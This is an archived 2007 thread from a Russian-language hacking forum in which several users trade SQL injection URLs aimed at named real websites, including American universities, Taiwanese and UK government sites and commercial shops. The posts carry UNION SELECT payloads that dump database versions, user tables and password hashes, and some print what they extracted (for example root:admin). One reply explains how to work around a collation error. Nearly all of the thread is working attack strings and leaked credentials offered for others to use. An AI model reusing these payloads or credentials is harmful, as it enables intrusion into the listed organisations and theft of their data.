ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #2521  
Старый 16.06.2007, 16:51
Ky3bMu4
Постоянный
Регистрация: 03.02.2007
Сообщений: 520
Провел на форуме:
1777536

Репутация: 932


Отправить сообщение для Ky3bMu4 с помощью ICQ
По умолчанию

yahoo - рулез!
yahoo`ярю! (с)
Всё - .edu !
Код:
http://www.skio.peachnet.edu/resources/library/serials.php?action=view&print=1&id=-57+union+select+version(),user()/* 
http://www.ksg.harvard.edu/iop/students_internships_db.php?action=id&id=-5+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/* - PR 8  

http://journalism.berkeley.edu/events/details.php?ID=-322+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,

22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54/*
http://alliance.la.asu.edu/azga/lp_view.php?lesson_id=-390+union+select+version()/* - в самом низу
http://www.loyno.edu/civildiscourse/journal.php?action=article_view&topic_id=4&article_id=-5+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+mysql.user/*
У многих есть доступ к таблице user, PR от 4 до 8. Разбирайте!

Спасибо огромное Isis!!! Сладенькое:
http://www.library.vcu.edu/ - PR 6

Код:
http://www.library.vcu.edu/whatsnew/news_result.cfm?ID=-744+union+select+1,2,convert(concat_ws(0x3b,password,user)using%20latin1),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+mysql.user
User: root
Password: 3f378de07c02b3c4


P.S.
Эээ... а что означает вывод:
Цитата:
General error: Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
???

Последний раз редактировалось Ky3bMu4; 16.06.2007 в 17:19..
 

  #2522  
Старый 16.06.2007, 17:08
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


По умолчанию

Цитата:
P.S.
Эээ... а что означает вывод:
Цитата:
General error: Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
Это означает что вывод нужен в кодировке latin1
Код:
convert(concat_ws(0x3b,version(),user(),database()) using latin1)
 

  #2523  
Старый 16.06.2007, 20:04
genom--
Постоянный
Регистрация: 09.07.2006
Сообщений: 937
Провел на форуме:
1948091

Репутация: 1686


По умолчанию

http://www.autosave-scotland.co.uk/%20shop/choose_model.php?manID='
www.qmul.ac.uk/courses/department.php?dept_id='
www.wilkinson-sword.co.uk/index.php?id='
 

  #2524  
Старый 16.06.2007, 21:39
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
По умолчанию

Цитата:
random
http://tutvsesvoi.ru/index.php?do=info&iID=-10+union+select+1,version(),3,4,5,6/*
http://tutvsesvoi.ru/index.php?do=info&iID=-10+union+select+1,concat_ws(0x203a20,aID,aName,aPa ss,aEmail),3,4,5,6+from+tutvsesv_tvs.tvs_auth+limi t+0,1/*
 

  #2525  
Старый 16.06.2007, 22:54
hitex
Новичок
Регистрация: 25.05.2007
Сообщений: 16
Провел на форуме:
80474

Репутация: 26
По умолчанию

Код:
http://ts.motronline.com/login.php?detail='+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x203a20,admin_id,admin_pass),14,15,16,17,18,19,20,21,22,23+from+gllcts2_admin+limit+0,50/*
http://www.bridgewater.edu/index.php?id=-857+union+select+1,2,3,4,5,6,7,aes_decrypt(aes_encrypt(concat_ws(0x3a,id,username,password),31337),31337),9,10,11,12,13,14,15,16,17,18,19,20+from+users+limit+17,3/*
 

  #2526  
Старый 17.06.2007, 01:26
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Цитата:
http://www.technepress.nl/publications.php?id=-19+union+select+1,convert(version()+using+latin1), 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
=)
 

  #2527  
Старый 17.06.2007, 01:40
SWAT
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753

Репутация: 552
По умолчанию

http://www.ciritas.ru/product.php?id=-10+union+select+1,2,id,4,name,6,7,8,9+from+client/*
 

  #2528  
Старый 17.06.2007, 01:42
maxster
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
Провел на форуме:
2298631

Репутация: 380
Отправить сообщение для maxster с помощью ICQ
По умолчанию

.gov

Код:
http://iff.immigration.gov.tw/enfront/lifep.php?tr_id=2&id=-111+UNION+SELECT+1,2,3,concat_ws(0x3a,user,password),5+from+mysql.user/*
MySQL

root:admin

Код:
http://www.colerainebc.gov.uk/show.php?id=-1111+UNION+SELECT+1,2,3,4,concat_ws(0x3a,user,password),6,7,8,9,10,11+from+mysql.user/*
root:47bccb536d8ad7ee

Последний раз редактировалось maxster; 17.06.2007 в 01:45..
 

  #2529  
Старый 17.06.2007, 02:34
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию

Код:
http://fuckthedrugs.net/groups/stream.php?memo_id=12+UNION+SELECT+1,username,3,4,password,6,7,8+FROM+mysql.users/*
root:58ac58431c5a1a5e
__________________
 

  #2530  
Старый 17.06.2007, 15:12
SWAT
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753

Репутация: 552
По умолчанию

http://www.happyland-drink.ru/brands.php?id=-2+union+select+1,concat(id,char(58),password,char( 58),user,char(58),email,char(58),phone),3,4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5+from+partners+limit+321,1/*

http://www.westlinegroup.ru/index.php?id=-182+union+select+1,VERSION(),3,4,5,6,7,8,9,10,11,1 2,13/*

http://www.mediasoyuz.ru/news/index.php?id=-712+union+select+1,VERSION(),3,4,5,6,7,8,9,10,11,1 2/*

http://www.moiki.net/articles.php?id=-16+union+select+VERSION(),2/*

http://bannerinter.com/index.php?id=2+union+select+1,2,table_name,4+from+ INFORMATION_SCHEMA.TABLES/*

http://www.ukrprint.com/job/show_message.php?id=-1820+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21/*

http://www.hosser.ru/index204.php?id=-379+UNION+SELECT+1,2,3,4,VERSION(),6,7,8,9+from+cl ients/*

http://www.pr.kg/or/detail.php?id=-231+UNION+SELECT+1,2,3,4,5,concat(id,0x3a,name,0x3 a,pass,0x3a,email),7,8+from+users/*

Последний раз редактировалось SWAT; 17.06.2007 в 16:31..
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ